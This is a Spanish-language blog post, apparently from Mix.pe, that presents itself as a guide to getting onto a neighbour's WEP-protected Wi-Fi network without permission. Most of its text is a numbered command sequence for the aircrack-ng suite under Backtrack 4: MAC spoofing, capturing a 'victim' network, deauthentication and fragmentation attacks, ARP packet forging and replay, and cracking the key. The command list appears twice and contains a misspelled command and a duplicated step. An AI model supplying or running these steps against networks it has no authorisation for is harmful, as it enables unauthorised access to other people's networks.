Como conectarme a una red inalambrica protegida? [hack]

[img_assist|nid=2563|title=|desc=|link=none|align=center|width=420|height=216]

 

Mucha, pero mucha gente siempre me pregunta como se pueden conectar a una red de un vecino que la tiene protegida, pues si su vecino la tienen en protección WEP están con suerte.

 

Hay varias formas de proteger tu red inalámbrica está el WPA, por numero MAC o WEP, por lo general la gente utiliza el WEP porque… me imagino porque es más sencillo de configurar, la cosa que el WEP le pones una clave de de 26 caracteres hexadecimales (0-9, a-f) pero como la gente no le gusta complicarse la vida le pone claves simples (por ejem su número de teléfono)

Bueno después de está explicación de que es WEP ahora ha salido una nueva versión de Backtrack 4 para Linux y que es esto?

Backtrack es una distribución de Linux que te permite romper esa protección WEP de manera… digamos que sencilla, solo necesitas un adaptod wifi USB que puedes conseguirlo desde $12 usado, Backtrack que lo puedes descargar gratis y paciencia…. (toma unas 2 horas)

Para usar Backtrack solo se lo descargan desde aquí.
Después lo graban en un DVD (pueden usar este programa gratuito para quemar DVDs)
Insertan en la laptop y lo corren (no necesita instalar)

de ahí solo sigan los pasos del siguiente video y estarán listos (ojo uno está en inglés y el otro en español)  si quieren saber todos los comandos están debajo de los vídeos:

 

 


 

Comando usados:

1: Ver tarjetas Wi-Fi conectadas al PC

airmon-ng

2: Parar modo monitor existente

airmon-ng stop rausb0

3: Poner la tarjeta en modo "down"

ifconfig rausb0 down

4: Cambiar la MAC de nuestro adaptador Wi-Fi

macchanger -m 00:11:22:33:44:55 rausb0

5: Volver a poner la tarjeta en modo monitor

airmo-ng start rausb0

6: Buscar redes víctimas y anotar sus datos

airodump-ng rausb0

7: Capturar "DATA"

airodump-ng -c "Canal de la víctima" -w pruebas rausb0

EJ:

airodump-ng -c 6 -w pruebas rausb0

8: Desautenticar la red, para poder empezar a agilizar la captura

aireplay-ng -5 -b "MAC de la víctima" -h 00:11:22:33:44:55 rausb0

EJ:

aireplay-ng -5 -b 00:40:F4:FE:9A:E9 -h 00:11:22:33:44:55 rausb0

9: Segundo paso de agilización de captura

aireplay-ng -5 -b "MAC de la víctima" -h 00:11:22:33:44:55 rausb0

EJ:

aireplay-ng -5 -b 00:40:F4:FE:9A:E9 -h 00:11:22:33:44:55 rausb0

10: Segundo paso de agilización

packetforge-ng -0 -a "Mac víctima" -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y "Archivo .xor" ARP rausb0

EJ:

packetforge-ng -0 -a 00:40:F4:FE:9A:E9 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragmentXXXXXXX-XXX.xor ARP rausb0

Nota: el archivo .xor será diferente

11: Tercer paso de agilización

aireplay-ng -2 -r ARP rausb0

12: Crackear red

aircrack-ng pruebas-01.cap
Comandos:

1: Ver tarjetas Wi-Fi conectadas al PC

airmon-ng

2: Parar modo monitor existente

airmon-ng stop rausb0

3: Poner la tarjeta en modo "down"

ifconfig rausb0 down

4: Cambiar la MAC de nuestro adaptador Wi-Fi

macchanger -m 00:11:22:33:44:55 rausb0

5: Volver a poner la tarjeta en modo monitor

airmo-ng start rausb0

6: Buscar redes víctimas y anotar sus datos

airodump-ng rausb0

7: Capturar "DATA"

airodump-ng -c "Canal de la víctima" -w pruebas rausb0

EJ:

airodump-ng -c 6 -w pruebas rausb0

8: Desautenticar la red, para poder empezar a agilizar la captura

aireplay-ng -5 -b "MAC de la víctima" -h 00:11:22:33:44:55 rausb0

EJ:

aireplay-ng -5 -b 00:40:F4:FE:9A:E9 -h 00:11:22:33:44:55 rausb0

9: Segundo paso de agilización de captura

aireplay-ng -5 -b "MAC de la víctima" -h 00:11:22:33:44:55 rausb0

EJ:

aireplay-ng -5 -b 00:40:F4:FE:9A:E9 -h 00:11:22:33:44:55 rausb0

10: Segundo paso de agilización

packetforge-ng -0 -a "Mac víctima" -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y "Archivo .xor" ARP rausb0

EJ:

packetforge-ng -0 -a 00:40:F4:FE:9A:E9 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragmentXXXXXXX-XXX.xor ARP rausb0

Nota: el archivo .xor será diferente

11: Tercer paso de agilización

aireplay-ng -2 -r ARP rausb0

12: Crackear red

aircrack-ng pruebas-01.cap

Y listo, tienes la clave WEP ūüôā
Y listo, tienes la clave WEP ūüôā

Vía: Lifehacker

Sobre msakiya 4245 Artículos

Dictador de Mix.pe visita mi cuenta de Google Plus